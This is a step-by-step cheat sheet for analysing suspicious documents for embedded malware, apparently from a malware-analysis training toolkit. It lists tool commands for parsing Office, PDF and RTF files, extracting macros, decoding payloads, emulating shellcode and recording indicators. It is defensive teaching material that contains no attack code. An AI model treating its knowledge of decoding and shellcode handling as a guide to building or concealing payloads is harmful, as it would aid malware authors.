============================================================ Malicious Document Analysis ============================================================ Analyze suspicious documents (PDF, Office, RTF, OneNote) for embedded malware, macros, and exploits. Follows Zeltser's 6-step methodology. Related FOR610 Labs: 3.1, 3.3, 3.4, 3.5 ──────────────────────────────────────────────────────────── Step 1: Format Identification Tools: file, trid Identify true format: OLE2 (legacy Office), OOXML (modern Office), RTF, PDF, OneNote. Don't trust the file extension — use magic bytes. $ file specimen.exe $ trid document.doc Step 2: Structure Analysis Tools: oledump-py, rtfdump-py, pdfid-py, pdf-parser-py, onedump-py Parse document internals. For Office: oledump.py to list streams (M = macro). For PDF: pdfid.py for risky keywords (/JavaScript, /OpenAction). For RTF: rtfdump.py for hex-heavy groups. $ oledump.py document.docm $ rtfdump.py document.rtf $ pdfid.py document.pdf $ pdf-parser.py document.pdf -a Step 3: Password Handling (if encrypted) Tools: msoffcrypto-tool If document is password-protected: msoffcrypto-tool -p . Common passwords: infected, malware, password, 123456. $ msoffcrypto-tool -p infected Step 4: Macro/Script Extraction Tools: oledump-py, olevba, pcode2code, XLMMacroDeobfuscator Extract VBA: oledump.py -s -v. For p-code: pcode2code. For Excel 4.0 macros: XLMMacroDeobfuscator. Check olevba for auto-execute triggers (AutoOpen, Document_Open). $ oledump.py document.docm $ olevba document.docm $ pcode2code $ xlmdeobfuscator --file Step 5: Payload Decoding Tools: base64dump-py, translate-py, gunzip, numbers-to-string-py, cyberchef Decode embedded payloads. Common chains: Base64 → gunzip → XOR. Use CyberChef for visual multi-step decoding. translate.py for byte-level transforms (byte ^ key). $ base64dump.py file.txt $ translate.py "byte ^ 35" < input.bin > output.bin $ gunzip -c compressed.gz > output.bin $ oledump.py doc.docm -s A3 -v | numbers-to-string.py -j $ cyberchef Step 6: Embedded Object Analysis Tools: scdbgc, xorsearch, yara, 1768-py If shellcode found: emulate with scdbgc. Scan for known patterns (YARA). Check for Cobalt Strike beacons (1768.py). Route PE payloads to Static Analysis Workflow. $ scdbgc /f shellcode.bin /s -1 $ XORSearch -W -d 3 file.bin $ yara-rules specimen.bin $ 1768.py shellcode.bin Step 7: Document IOCs Record: embedded URLs, downloaded payload hashes, C2 addresses, macro behavior (what APIs called), exploit type (CVE if applicable). ──────────────────────────────────────────────────────────── Tip: 'fhelp cheat ' for full examples 'Ctrl+G' for interactive cheatsheet browser